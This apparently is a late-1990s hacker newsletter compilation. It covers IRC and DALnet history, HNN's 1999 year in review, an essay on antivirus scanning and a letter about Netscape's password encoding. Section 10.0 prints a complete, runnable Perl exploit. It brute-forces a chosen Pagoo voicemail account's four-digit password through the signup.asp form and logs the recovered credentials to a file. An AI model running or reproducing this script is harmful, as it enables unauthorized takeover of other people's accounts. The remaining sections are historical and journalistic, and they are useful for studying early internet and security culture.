Through ai.ai.mit.edu I got to know Vijay Subramaniam (I hope I spelled that correctly :-). I had given IRC to him and not heard of him for some time. Then I got mail messages from Jeff Trim (used to be jtrim@orion.cair.du.edu, University of Denver, current address unknown), David Bleckmann (bleckmd@jacobs.cs.orst.edu) and Todd Ferguson (melvin@jacobs.cs.orst.edu, Oregon State University). Vijay had given IRC to them and they had started ircd on their machines (orion.cair.du.edu and jacobcs.cs.orst.edu, if I remember correctly) and wanted to connect to the Finnish irc network.
After that some other people started running IRC, and the number of servers grew quickly. The first IRC server (and still running) was tolsun.oulu.fi. I have no idea of the latest one..

Aug 88 - first irc server tolsun.oulu.fi
89 - ircII released by Michael Sandrof (BigCheese)
Mar 90 - 2.2msa4
Jun 90 - 2.5beta ("+" named channels)
Jun 90 - ircII 1.90a
Jul 90 - 12 users on 38 servers
Aug 90 - IRC splits into EFnet (Eris Free) and Anet (Anarchy)
Sep 90 - 117 servers
Sep 90 - 41 users 86 servers
Nov 90 - version 2.6 released
Dec 90 - ircII 2.0beta10
late 90 - Darren Reed (Avalon) adds hash tables when IRC stops under load
xxxx 91 - Troy Rollo (Troy) takes over ircII development
Jan 91 - The Gulf war.. usage goes from peak 100 to peak 300
Jan 91 - version 2.6.1 adds flow control..
Feb 91 - bandwidth NSF stats record 8.8 Gigs for month of Feb
Mar 91 - NSF is all T1
Mar 91 - 2.6pre18 (famous for running on services.de long after 2.7 release)
Mar 91 - bandwidth 200k/2 hours
Mar 91 - 135 servers 69 us 66 non us
Apr 91 - 240 users median
Jun 91 - Cori booted off
Jul 91 - The.PLAN
Aug 91 - ircII 2.1.3
Oct 91 - 399 users 120 servers 44 opers (hits 500)
Nov 91 - ircII 2.1.5pre3
Sum 92 - ICMP attacks (cert advisory July 92)
Jan 93 - Matthew Green (phone) takes over ircII development
xxxx 94 - irc.colorado.edu hits 1000 users
late 94 - IRC hits 5,000 users
mid 95 - irc.escape.com hits 2000 users
Oct 95 - IRC hits 15,000 users
Feb 96 - Possibly largest channel ever. Id releases Qtest. #Quake sees 1556 users
May 96 - EFnet splits into two separate networks, Europe and the US, as a result of a disagreement on whether the network should use TS or Nick Delay as a means to prevent nick collisions.
Apr 97 - IRC hits 30,000 users
Jun 97 - irc-e.primenet.com and irc1.phoenix.net both break 3000 clients
Oct 97 - "smurf.c" - multi-broadcast ICMP attack posted to Bugtraq. Denial of Service attacks on EFnet servers hit an all-time high
Jan 98 - IRC hits 40,000 users
Mar 98 - irc.blackened.com breaks 4000 clients
Apr 98 - irc.blackened.com breaks 5000 clients
May 98 - irc.blackened.com breaks 6000 clients
Jun 98 - irc.blackened.com breaks 7000 clients
Sep 98 - irc.blackened.com breaks 8000 clients
Feb 99 - irc.idle.net breaks 9000 clients
Feb 99 - irc.idle.net breaks 10000 clients
Feb 99 - IRC hits 50,000 users
Jul 99 - irc.freei.net breaks 11000 clients
Aug 99 - irc.concentric.net breaks 12000 clients
Aug 99 - irc.concentric.net breaks 13000 clients
Nov 99 - EFnet breaks 60,000 clients
Nov 99 - irc.core.com breaks 14000 clients
Dec 99 - irc.core.com breaks 15000 clients
Dec 99 - irc.core.com breaks 16000 clients

Need dates for

- IRC gets 10 servers
  see my note above from Jarkko

- IRC gets 100 servers
  the very first time it was done was May 1990, but it soon dropped down again. It was before the split and anyone could set up a server so we set up a few on machines at UC to bring the total up to 100 :-) [before EFnet/Anet]

- IRC gets 200 servers
  (it has been over 200.. but has dropped since)

- irc2.4 (numeric only channels)
  here's a bit of history... I first started using irc in January or February of 1990. At the time the latest server revs were 2.2PL0 and 2.2PL1. msa and Chelsea Ashley Dyerman were working on the 2.3 release ... there was a disagreement between them about the copyrights. Chelsea had everything copyrighted by the IRCDC (IRC Development Consortium). People told her they didn't like that, it should be GPL'ed. She released 2.3alpha with those copyrights. Very few sites ran it as it didn't offer much over 2.2PL1. At the same time, msa was doing his own work.
  He added very handy things like /whowas, nick chase kill, wallops (later removed), and remote /away propagation. He had several releases, the most stable being 2.2msa4 and 2.2msa9. 2.2msa10 eventually turned into 2.4 (2.3 was "tainted" by Chelsea). Jarkko came along and did a bit of cleanup on 2.4 (which was stable in and of itself) and released 2.4.1.

- irc2.5
  Armin did 2.5 alpha, and then Jarkko took it over, with his idiotic 2.5+ release. msa (I believe) did 2.5.1 ... then Tom Hopkins and some other BU folks (myself included) collaborated on 2.5.1.bu.10, possibly the most stable server version to date :-) No new features went into 2.5.1.bu.10 (also called 2.5.2 in the docs, but it was never released as such), just bug fixes. I wish we did that nowadays :-)

- irc2.6 + channels (still have numerics) # channels added later on
  Armin started the 2.6 release and then Avalon took it over.

- irc2.7 # channels replace + channels and numerics go away forever
  2.7 was a nice cleanup release. People tried to do things a bit more by the book. ircd was put through a saber C check (and bullied into compliance :-) Bans were added to the server in 2.7. In 2.6 you could kick a user out but had to rekick or go +i to stop them from rejoining.

- irc2.8 & channels..

- irc2.9 + channels are back, sorta
  Read the operlist archives on ftp.kei.com:/pub/irc/mailing-lists

USBIC, planned in 1993, never passed. Again, more archives on ftp.kei.com:/pub/irc

Again, I really suggest you look at the operlist and irclist archives on ftp.kei.com:/pub/irc/mailing-lists -- it covers most of these issues.

- WALLOPS removed
  Again, the dates should be in the archives

- MODES added
  modes were added with + channels.

-=-

Source: http://www.dalnet.com/

DALNET History file

The History of IRC
September 1999

Contents

1. Some information on IRC
2. Some information on DALnet
3. Looking to the future

1. Some Info on IRC

IRC or Internet Relay Chat was originally written by Jarkko Oikarinen in the year 1988.
Since its birth in Finland, IRC has come into use in over sixty countries worldwide. IRC was originally designed as a replacement for a program called "Talk". "What is IRC?" you may ask. IRC is a multi-user chat system that connects 'servers' around the world by means of a 'cable' of sorts. These servers form a gigantic web that allows you to connect to a given server. You can then join 'chat rooms' or 'channels' that don't really exist. They are virtual meeting halls of sorts. This allows anyone with an internet connection to participate in live chat.

IRC is a constantly evolving machine. New changes are made to the IRCd (Internet Relay Chat Daemon or server program) that make your IRC experience all the more enjoyable. DALnet coders have recently created a new IRCd, Bahamut, which enables servers to run faster and more efficiently. You can get more information at http://www.bahamut.net.

During IRC's relatively short history it has quickly shown its superiority over other chat systems like those owned by America On Line. This is because of several reasons. Firstly, IRC is free. There is no charge to use IRC or DALnet and there are no prerequisites to join.

Internet Relay Chat was propelled into the spotlight during the gulf war in 1991. During this period information was relayed from around the world. Families could communicate from thousands of miles away. IRC was a meeting place and an information clearinghouse for those who needed information that was both up to date and reliable. IRC has also been used during the Los Angeles Riots, the bombings in Israel, the Presidential Elections in the United States, and of course, Monica Lewinsky's deposition.

The DALnet IRC Network believes strongly in free speech and freedom unless United States Federal Law or worldwide law is broken.
As will be stated below, IRC is supported by individuals who gain no profit from their support of IRC (ISPs excepted). Therefore, many IRC networks including DALnet do not allow the trading of illegal software or 'warez' or the so called 'kiddy-porn.'

At this time DALnet has about 40,000 users and forty-two servers worldwide. It is important to remember that Internet Relay Chat is free and is supported not by a conglomerate company but by a small group of generous ISPs (Internet Service Providers), Admins (Server Administrators) and IRCops (IRC Operators). None of these people are paid for their support and generously provide a safe environment for you, the user.

2. Information on DALnet

The DALnet IRC Network was created as a replacement for the troubled EFnet (Eris Free Net) and Undernet IRC Networks. EFnet has over fifty-thousand users and eight thousand active channels. This is the largest of the IRC Networks but it does have many troubling downsides. EFnet is also one of the slowest networks. There is usually tremendous lag time because of overwhelming numbers of users, bad server routing and connections and also hacking. EFnet has hundreds of servers but has frequent NetSplits and thus needed to be replaced by something more efficient. From this the Undernet was born.

Undernet, though smaller, has servers in the United States, Canada, Australia and in Europe. The Undernet attempted to do away with the high consumption of bandwidth and channel chaos that was created by a large number of users running bots (programs that perform a certain task). These bots were usually intended to protect channels from takeovers or were used to take over channels themselves. The Undernet offered the CService, a program that allowed users with W or X type bots to register channels and protect them from troublemakers. The Undernet hit major stumbling blocks in the areas of customer services and care, but the one area of service that the Undernet excelled at was in innovations.
The Undernet allowed new commands to be installed in the IRCd and new channel modes to be used. It also allowed greater security for channels and channel modes, as well as for users.

The summer of 1994 dawned a new age for the users of Internet Relay Chat. During this time the DALnet IRC Network was formed using a modified version of the Undernet IRCd. This IRCd was edited chiefly by Alexei "Lefler" Kosut. Some of the innovations included: global WallOps (IRCop messages that can be seen by users who are +w (/mode NickName +w)), longer nicknames, Q:Lined nicknames (nicknames that cannot be used, i.e. ChanServ, IRCop, NickServ, etc.), global K:Lines (ban of one person or an entire domain from a server or from the entire network), IRCop-only communications (GlobOps), a +H mode showing that an IRCop is also a HelpOp, and many, many more features.

DALnet's unique services were originally coded in early 1995 by Brian "Morpher" Smith and allow users to own nicknames and channels, send memos and do much more. These services are superior to the X and W bots because they are omnipotent and invisibly reside in every channel; because of this, channel bots are not needed. ChanServ's automatic channel registration eliminates the lengthy processes of Undernet while still being extremely easy to use and also very secure. DALnet also provides users with the ability to 'own' a nickname. The /nickserv register PASSWORD command is all that is needed to own your nickname and ensure that it is always there for you when you come online (Note: PASSWORD is your own password, which you MUST remember or write down for future use). DALnet users can also send Post-It type 'memos' to each other if both users' nicknames are registered. More info on services is available on their pages.

Many servers have linked to and parted from DALnet in the few years that it has existed.
Some have left due to bandwidth problems, Internet Service Provider problems, interpersonal problems, and other reasons.

3. Looking to the future

DALnet continues to grow. Its user count has rocketed from around 30,000 at the beginning of 1999 to 45,000 during the summer. DALnet's extensive and well developed help system, whereby a person has a large number of 'recommended' channels and other resources at their fingertips, continues to go from strength to strength. Among the current innovations are freshly coded services which allow users to gain full potential from nickname and channel registration, and the new IRCd (http://www.bahamut.net) to ensure a quick, worry-free connection. DALnet's staff are still the pride of the network; users can join #OperHelp for speedy assistance from an IRCop, and you'll always be assured of a smiling, helping hand when you need it.

Some information contributed by: nelgin, Sentinele, dalvenjah, WebMaster, blofeld and the_saviour.

@HWA

10.0 Pagoo Internet voice MailBox by Loophole/HHP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Loophole

The hole here is simply the absence of any lockout or rate limit on a four-digit password: at most 10,000 requests walk the whole keyspace, so this is guaranteed to succeed rather than merely likely to. - Ed

#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: LoopHole of the hhp.
# http://hhp.hemp.net/
# 6/25/99
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying a new password from 0000 in
# increments of 1 till we reach 9999 which
# is the highest password possible... I
# could call this a brute, but it always
# 100% of the time will get the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids

use strict;
use warnings;
use IO::Socket;

die "usage: $0 <PagooID>\n" unless @ARGV == 1;
my ($box) = @ARGV;

open my $out, '>>', 'pagooids' or die "Can't open log file pagooids: $!\n";
$out->autoflush(1);
STDOUT->autoflush(1);

my $host = "www.pagoo.com";

# Request the UpdateForm with one candidate password and inspect the
# response: "Password invalid" means a wrong guess, "First Name" means
# the form itself came back, i.e. the guess was correct.
sub try_password {
    my ($num) = @_;
    my $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
    my $socket = IO::Socket::INET->new(PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => "tcp")
        or die "Can't connect to $host: $@\n";
    print $socket "GET $url HTTP/1.0\r\nHost: $host\r\n\r\n";
    print "Trying password: $num of 9999.\n";
    while (<$socket>) {
        chomp;
        last if /Password invalid/;          # wrong guess, stop reading this reply
        if (/First Name/) {
            print "PagooID password extracted...\n";
            print "PagooID: $box / Password: $num\n";
            print $out "PagooID: $box / Password: $num\n";
            exit 0;
        }
    }
    close $socket;
}

# Walk the whole four-digit space exactly once, 0000 through 9999.
for my $i (0 .. 9999) {
    try_password(sprintf('%04d', $i));
}

@HWA

11.0 HNN: The Year in Review 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Note: Check the url for relative links included in the text. - Ed

Page 1

Nineteen Ninety Nine was an exciting year that saw explosive growth for HNN and our ever continuing battle against Fear, Uncertainty, and Doubt (FUD). While some of our engagements with FUD have been successful, like the alleged moving of a British satellite, other battles, like the numerous virus scares, were not. 1999 also saw some major events unfold in the underground community, from the exposure of Se7en as a fraud, to the removal and resurrection of Packet Storm Security, and the debacle of MTV. At the close of the year Kevin Mitnick is awaiting release while others take his place behind bars. Throughout 1999 HNN was the place on the net to get up to date breaking news on these stories. These top eleven stories of 1999 are not presented in any particular order.

LoU China-Iraq War

On December 29, 1998 the underground group Legions of the Underground declared all-out cyber warfare on the information infrastructure of China and Iraq.
They cited severe civil rights abuses by the governments of both countries, as well as the sentencing to death of two bank robbers in China and the production of weapons of mass destruction by Iraq, as the reasons for their declaration. By January 5th, 1999 a group known as spl0it and a group based in Poland said that they would assist LoU in their cyber warfare efforts. On January 6th, 1999 Legions of the Underground released a statement contradicting their earlier statements, claiming that they never had destructive intentions and blaming the media for letting this get out of hand. The retraction by LoU came too late. On the next day, January 7th, 1999, an International Hacker Coalition including groups such as cDc, L0pht, CCC, 2600, Phrack, !HISPAHACK and others released a joint statement condemning the Legions of the Underground and their Declaration of War. By January 8, 1999 LoU was reeling from the overwhelming support for the joint condemnation of LoU's actions and released additional retractions of their declaration of war. On January 13, 1999 the Legions of the Underground told Wired magazine that the original press conference was a fake and that the people present during the press conference were spoofed. There is no evidence to support this, but there is none to deny it either. Finally Optiklenz, a member of LoU, released a statement giving the view of what happened from the LoU perspective.

LoU-China-Iraq War Histogram - Chronological Listing of Events
HNN Archive for December 29, 1998
Transcript of IRC Press Conference with LoU
LoU Declaration of War
HNN Archive for January 6, 1999
International Hacker Coalition Joint Statement
LoU Retraction of War Declaration
Optiklenz Statement

Hackers Move British Military Satellite

This is one battle with FUD that we like to claim that we won.
On March 1, 1999 The Sunday Business published a story, later picked up by the Reuters wire service, that a British military satellite had been taken over by cyber attackers and was being held for ransom. The story itself lacked any sort of verifiable information and HNN called it into question immediately. By the next day spokespeople from the British Ministry of Defence flatly denied that such a thing was even possible. HNN editor Space Rogue was a guest on the radio show "Off the Hook" to discuss this incident. Both ZDNet and MSNBC ran stories covering this non-event, crediting HNN for calling the story suspect. Bob Sullivan of MSNBC went so far as to label HNN "The Voice of Reason".

HNN Archive for March 01, 1999
HNN Archive for March 02, 1999
Original Sunday Business Article
Security Analysis of Satellite Command and Control Uplinks - Buffer Overflow Article by Brian Oblivion
MSNBC
ZD Net
Off The Hook - March 02, 1999 episode

Se7en Exposed

An article written by Steve Silberman and published by Wired exposed Se7en (Christian Valor) and his single-handed cracker crusade against pedophiles as a complete sham. Se7en succeeded in creating a massive media hack as articles about his infamous exploits were published in Forbes, MSNBC, the LA Times, Newsday and others over several months. Only one of the journalists we know of who had been duped by Se7en, Adam Penenberg, actually admitted his mistake and published a public apology.

HNN Archive for February 8, 1999
Attrition.org - Evidence used against Se7en
Wired
Open letter from Adam Penenberg

Page 2

John Vranesevich Shuts Down Packet Storm Security

Probably the biggest story of 1999 was the actions of John Vranesevich, founder and administrator of AntiOnline, who was instrumental in getting the extremely popular web site Packet Storm Security shut down.
As far as can be determined, John Vranesevich discovered a private directory on Packet Storm that contained potentially libelous material about him and his family. Mr. Vranesevich did not contact the site administrator directly but instead sent an email to the administrators at Harvard University asking that the objectionable material be removed. Harvard responded by unceremoniously pulling the plug on the whole site. Once word got out of how and why Packet Storm had gone down, a public outcry ensued. Mailing lists were started, people began an attempt to mirror the site, Ken Williams received numerous offers to host the site, and Mr. Vranesevich became the whipping boy du jour. Because Mr. Williams was unable to access his web site, which was his senior project, he was forced to drop out of school. He later sold the web site to Kroll O'Gara and took a position at a major internet security company.

HNN Archive for July 1, 1999
HNN Archive for July 2, 1999
Attrition.org - Examples of the supposedly libelous materials posted to Packet Storm
Ken Williams Statement
AntiOnline - John Vranesevich's Defense
Letter from Harvard
Ken Williams Response to Harvard
Letter From Bronc Buster - Regarding the actions of Mr. Vranesevich
ZD Net

HNN Pulls Massive April Fools Joke

It was meant as a simple joke, a simple April Fools Day prank, a reason to smile or to laugh. It turned into one of the biggest stories in the underground for 1999. At midnight EST on April 1, 1999 the main Hacker News web page was updated with what appeared to be a web defacement. The page contained all the required elements of a defacement: poor spelling, hax0r speak, shout outs, etc. Many, many people bought the defacement hook, line and sinker; HNN administrators even got personal phone calls at home at 8am to inform them of the defacement. Remember, even as recently as April, web defacements were a relatively rare thing, not occurring by the dozens like they are today. Ahhhh, but the fun did not stop there.
At noon EST the HNN pranksters felt the unsuspecting public needed even more mayhem and hijinks. The defaced page came down and the day's news went up. The news contained stories such as Kevin Mitnick breaking out of jail by whistling a 300 baud carrier into a phone, L0pht Heavy Industries selling L0phtCrack for $1.2 billion to NAI, CERT going out of business, and Microsoft buying Network Solutions for complete control of the Internet. Considering the volume of mail we received regarding these stories (some of which came from mainstream journalists), many, many people believed them.

Archive of HNN Defacement
HNN Archive for April 1, 1999

PhoneMasters

For some reason the mainstream media has really not paid attention to this story. Considering the level to which these crimes escalated and the methods and effort needed to catch these crooks, it is a wonder that there wasn't more media coverage. The FBI called them the 'Phone Masters' and labeled their crimes as one of the greatest cyber-intrusions of all time. Court records show that the Phone Masters had gained access to telephone networks of companies including AT&T Corp., British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun & Bradstreet. They could eavesdrop on phone calls, compromise secure databases and redirect communications, and they also had access to portions of the national power grid and to air-traffic-control systems. The FBI had to invent special equipment they called a 'data tap' specifically for this case and get special permission from the DOJ to use it. It took several years of listening to phone calls to gather enough evidence for an arrest, but on February 22, 1995 the FBI conducted a raid on three suspected members of the PhoneMasters. Other members of the group are thought to remain at large.
Three members of the group pleaded guilty to federal charges of one count of theft and possession of unauthorized calling-card numbers and one count of unauthorized access to computer systems. The three were sentenced in October to 24 to 41 months in federal prison. What bothers us most about this story is that almost no mainstream media has reported on it. The first mention we can find of the Phone Masters is from a local TV station, WFAA in Dallas-Fort Worth, back at the beginning of May.

Phone Master Hacks - Buffer Overflow Article
HNN Archive October 4, 1999 - PhoneMasters Plead Guilty
Wall Street Journal - one of the few articles about this case
Union Tribune - Another rare article that has a little bit more info.
CNN - Tries to answer why the media missed the boat
Aviary Mag - Interview with An Acquaintance of the Phone Masters

MTV

Serena Altschul, host of MTV News and of a documentary-style program known as 'True Life', wanted to do a show on 'hacking' and in particular a show about Kevin Mitnick. She was placed in contact with Emmanuel Goldstein of 2600 Magazine, who organized several interviews for her. He spent a lot of time and effort getting good people for her to talk to, and they shot several hours' worth of film. For one reason or another the Kevin Mitnick aspect of the show was cut out, so, being a good sport, Emmanuel directed Serena to the folks at L0pht Heavy Industries. The L0pht crew made time in their busy schedules to spend an entire day with Serena and her film crew explaining the finer points of what they do and the difference between script kiddie defacements and true hacking. Again, for some reason this angle for the show was not to MTV's liking, so they struck out on their own looking for whatever it was they wanted. They found Shamrock, the host of the Internet TV show devoted to hacking known as Pseudo. The result was a complete farce.
Evidently Shamrock decided to take MTV for a ride and give them what they wanted: a story line straight out of the movie Hackers. The show did nothing to explain what hacking was all about and was far from a documentary. Needless to say, many people are upset at MTV and others over this mess.

Letters from HNN Viewers
Letter from Emmanuel Goldstein
Letter from Shamrock

Page 3

Defcon VII and BO2K

Defcon probably had the most mainstream media coverage of any hacker convention to date. With over 3000 attendees and over 200 press representatives present, it was definitely one of the biggest conventions ever. With the release of Back Orifice 2000 from the Cult of the Dead Cow, the press was working at a fever pitch trying to cover the story even before the software was released. HNN spent quite a few days inebriated in Las Vegas while we tried to cover the happenings at Defcon. Some of the highlights included the BO2K launch presentation, complete with thumping techno and strobe lights, the ejection of Carolyn Meinel from the conference floor, and the defacement of the Defcon.org web page. When we returned we had over 1200 emails to answer and one pounding hangover. The media went nuts over the BO2K release, sparking debates on just what a virus is and what should be scanned. Network Associates claimed to be the first out of the gate with a patch for the program. Microsoft was even prompted to release a security bulletin. Also at Defcon, Zero Knowledge released 1000 beta copies of Freedom, L0pht Heavy Industries introduced the revolutionary new security tool AntiSniff, Bruce Schneier announced that PPTPv2 'sucks less', and Security Wizards released their Capture the Flag logs.
HNN Archive for July 9, 1999 - Press frenzy prior to con
Defcon.org Defacement Mirror
HNN Archive for July 13, 1999 - the Aftermath
Defcon VII Review - Buffer Overflow Article
The Back Orifice 2000 Controversy - Buffer Overflow Article
How the Anti Virus Industry Works - Buffer Overflow Article
AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article

Kevin Mitnick

Kevin Mitnick's road has been a long and bumpy one that has stretched over several years, and 1999 was no different. One small bright spot is that Kevin is scheduled to be released, finally, sometime early in 2000. In March the federal government succeeded in wearing Kevin down. He decided to plead guilty in the hope of getting his four-year ordeal over with. Unfortunately he still had charges from the State of California to deal with.

HNN Archive for March 29, 1999

On April 26th it was revealed that the companies supposedly hurt by Kevin Mitnick's theft of software never reported those millions of dollars in losses to the SEC as required by law.

HNN Archive for April 25, 1999
Letters from companies estimating the amount of damages.

June 4th was supposed to be the day on which Kevin was officially sentenced, and so demonstrations to support Kevin were planned at federal courthouses across the country. Unfortunately the hearing was postponed at the last minute, but the demonstrations continued. Folks in other countries joined in by protesting outside embassies, the New York demonstration hired a skywriter to write FREE KEVIN over Central Park, the Philadelphia demonstration made it onto the local news, many online news agencies covered the San Francisco demonstration, and numerous other cities attempted to live webcast their demonstrations.

HNN Archive for June 5, 1999
Press Release - Demonstration Announcement
Picture of the Russian Demonstration

On Kevin's fifth birthday behind bars the LA District Attorney graciously decided to drop the state charges against him.
The DA claimed that the case had been mischarged. Finally, on August 9th, after numerous delays, Kevin received his sentence of 46 months in prison with credit for time served. He will also be forced to pay $4125 restitution to the supposed victims in the case. Instead of a halfway house as expected, he was remanded to Lompoc Federal Prison.

HNN Archive for August 9, 1999

Much more in-depth information regarding Kevin Mitnick, his current status and the historical significance of this case can be found on HNN.

FREE KEVIN

Virus Scares

1999 was a banner year for viruses. Melissa, CIH, and numerous other viruses had the press working overtime. The virus writers keep churning them out, the antivirus companies keep detecting them, and the press was not far behind. Melissa was extremely virulent. By emailing 50 copies of itself after every infection it made it around the globe very quickly. It managed to jump the air-gap onto the US government's SIPRNet and even made it on board ships in the Seventh Fleet. Numerous variants of Melissa surfaced with distributed DoS attack capability. Melissa was somehow traced through Usenet to AOL and finally to David L. Smith, who pleaded guilty to creating and releasing the virus.

HNN Archive for March 31, 1999 - Melissa makes it to 7th Fleet, Kills Marines Email, DoS Variant Appears
HNN Archive for April 2, 1999 - David Smith arrested and released on $100,000 bail
HNN Archive for April 5, 1999 - Melissa jumps air-gap onto classified SIPRNet
HNN Archive for December 12, 1999 - David Smith pleads guilty.

CIH, while not as prolific as Melissa, was definitely more destructive. CIH, or Chernobyl, is triggered to release its payload on April 26th every year and has been around for a while. It hit exceedingly hard this year, especially in the Far East. Its creator was traced back to Taiwan, where he said he was sorry.

HNN Archive for April 27, 1999 - CIH strikes worldwide
HNN Archive for April 29, 1999 - CIH Author Identified.
HNN Archive for May 12, 1999 - China Estimates 360,000 systems Damaged by CIH
The Virus Community Speaks
How the Anti Virus Industry Works - Buffer Overflow Article
AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article

Ireland, Indonesia, China, Sweden, and Yugoslavia

Government-sanctioned cyber attacks seem to be all the rage these days. Some countries are openly announcing their plans to create offensive cyber warriors, while others claim to have already suffered government-sanctioned cyber attacks. In January a small ISP in Ireland, Connect Ireland, which hosts the top level domain for East Timor, claimed that it had suffered a massive attack by Indonesian government forces. Indonesia of course denied the charges.

HNN Archive for January 26, 1999

Newsweek claimed that President Clinton authorized a "top-secret" plan against Slobodan Milosevic. One part of this plan would use "computer hackers" to attack his foreign bank accounts. Newsweek went on to say that the report instructed the CIA to wage "cyberwar" against Milosevic.

HNN Archive for May 24, 1999
HNN Archive for July 6, 1999
Yugoslavia Cut Off from the Net? - Buffer Overflow Article

Sweden announced the formation of a cyber defense force.

HNN Archive for July 14, 1999

Nobel Peace Prize laureate Jose Ramos-Horta claimed that hundreds of people around the world were poised to launch a cyber attack against Indonesia should there be any tampering with the election process for East Timor's freedom. No evidence was given for this cyber arsenal build-up and no attack ever came. Connect Ireland, the ISP supposedly targeted by Indonesian forces earlier in the year, asked that no internet attacks be launched.
HNN Archive for August 20, 1999
Connect Ireland - response to Indonesian threats

A Chinese military newspaper covering the activities of China's People's Liberation Army has called for the recruitment of 'civilian hackers' and for the training of 'cyber warriors' at Army schools.

HNN Archive for August 4, 1999

We hope that this disturbing trend does not continue into the next year. It will be an extremely bad day when the internet is legislated as a weapon of war.

@HWA

12.0 AntiVirus scanning for potentially misused tools is a doomed security strategy.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
The Anti-Virus vendors seem to be taking on a larger role. Not only are they scanning for true viruses and trojan horses but for any software that may potentially be misused, as long as it is not their own software. This activity does nothing to close the holes in your network but instead gives you a false sense of security.

Buffer Overflow
http://www.hackernews.com/bufferoverflow/

AntiVirus scanning for potentially misused tools is a doomed security strategy.
By: Weld Pond, weld@l0pht.com
L0pht Heavy Industries
December 20, 1999

There is a growing trend with AntiVirus scanners today. The scanners are scanning for more and more software that does not contain virus or trojan code. The new category of software the scanners are looking for is common software that has the *potential* to be misused by malicious persons. Usually this software is in the security auditing tool, network monitoring, or remote control category. Corporate customers of AntiVirus software have requested that these potentially misusable programs be flagged and, in some cases, "disinfected" by the scanning software. The AntiVirus vendors seem more than happy to comply, even going so far as to label this new category of detected software as a "virus" or "trojan" when found, no matter how misleading the label is to the user.
Another controversial twist in this new AntiVirus category is the fact that the AntiVirus vendors do not scan for their own tools that fall into the new "potentially misusable program" categories. Symantec's Norton AntiVirus will scan for the remote control programs NetBus or BO2K, but not for the company's own pcAnywhere. Network Associates' McAfee VirusScan will detect the NT password auditing tool L0phtCrack, but will not detect the company's own vulnerability auditing tool, CyberCop Scanner, or their network sniffers, Sniffer Basic and Sniffer Pro. It is a fallacy that commercial tools are not misused by malicious individuals. They are usually available as free trial downloads or on pirate software sites.

However, the whole notion of protecting a network by scanning for potentially misusable tools is a fallacy unto itself! Using AntiVirus client scanning technology to find programs that can exploit the security problems on a network is a losing battle. AntiVirus software can be turned off. New tools, or new versions of older tools, will soon become available. Other machines without AntiVirus software can be attached to the network. Machines can be booted with alternative OSes. You need to actually fix the network security problems! It is foolhardy to scan for tools that could exploit problems rather than just fixing the problems.

This scanning scenario just gets OS and application vendors off the hook. Now they don't have to fix the problems; they will just rely on the AV vendors to scan for programs or code that can exploit them. Why fix, for example, Win 95/98 challenge-response network authentication? Each client on the network should be scanning for all known tools that can sniff the network or crack the passwords. Obviously this is not a good security model. Scanning for potentially misused tools is leading network security down the path to the horrible situation we have with mobile code sent through email or through the web.
The current industry-accepted solution is not to solve the problem with a proper security architecture for hostile mail or web content, but instead just to scan for all *known* malicious mobile code. Ugh! The AntiVirus vendors have a vested interest in the status quo, but this is not bringing the industry closer to a solution. Broadening this approach to cover network security problems is clearly heading in the wrong direction. Can you imagine a day when a vendor responds to an intranet security vulnerability by saying, "This is not a problem with our product. We do, as always, recommend that all customers keep their AV software updated."? It is time to start making networks and computers secure without relying on the approach of client code scanning. A false sense of security is worse than known poor security. If your network security cannot survive well known tools being installed and executed, then you need to start addressing your problems, not sweeping them under the rug.

Weld Pond
weld@l0pht.com

@HWA

13.0 RST Sets the Record Straight
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by John
Last week Reliable Software Technologies, Inc., released a new advisory regarding the storage of email passwords by Netscape. They took a lot of flak from people, including HNN, who thought this was an old problem being rehashed by RST for cheap publicity. RST would like to take a moment to sort out the details and explain their new advisory and the old problem.

Letter from RST
http://www.hackernews.com/special/1999/rst.html

Reliable Software Technologies
http://www.rstcorp.com

Date: 12/19/99 21:57
Received: 12/19/99 22:04
From: John Viega, John@list.org
To: contact@hackernews.com

Hey,

I believe that what HNN posted today about the Netscape thing is largely inaccurate. First, there are and have been two different ciphers in use in Netscape that are similar, but slightly different.
The simpler one, which is a base 64 and an XOR only (with potentially a pad), apparently made the rounds a year ago, and people did note that it looked similar on recent versions of Windows. But it isn't the same right now. Maybe Netscape changed their cipher from last year, or perhaps it has been the same through the whole 4.0 series. I dunno, but at some point they did change it. I looked at the 2.0 series, the 3.0 series, and 4.6 + 4.7 on Windows. The 4.6 and 4.7 cipher is substantially different from the 2/3 cipher. The 2/3 cipher is the same as current versions of Unix and Mac. Let's face it... user habits are different on Windows than on Unix. Few if any people use NS to read mail on a Mac. Plus, Windows has a lot more dumb users. So we have definitely broken a different cipher.

We didn't know that the older cipher was previously broken. When we talked to Netscape, they gave us no indication that it ever had been. In fact, they seemed to be indicating that they were crossing their fingers hoping that no one would target it. Also, the old attack wasn't very well publicized. Again, I suspect that NS knew about the old attack, was glad it stayed low key, and quietly made the algorithm a bit harder on its flagship Windows version without making a real effort to fix the problem.

The new cipher still does a base 64 encode and an XOR with a fixed key. However, it also does some bit permutations, and reads the bytes in reverse order. If you look at the same 7 char password encoded with the old algorithm and the new algorithm, you will notice that they aren't the same. You'll notice the "=" pad is at the front in the new kind, and comes last in the old kind. The strings will also look similar, but aren't the same thing reversed, or anything like that. It wasn't that much stronger, but they obviously hoped it would provide a bit more security.
Funny, the MSDN developer's network talks about security, mentions that XOR is desirable, and suggests tricks like this to help improve the security of XOR. It's completely and utterly ridiculous.

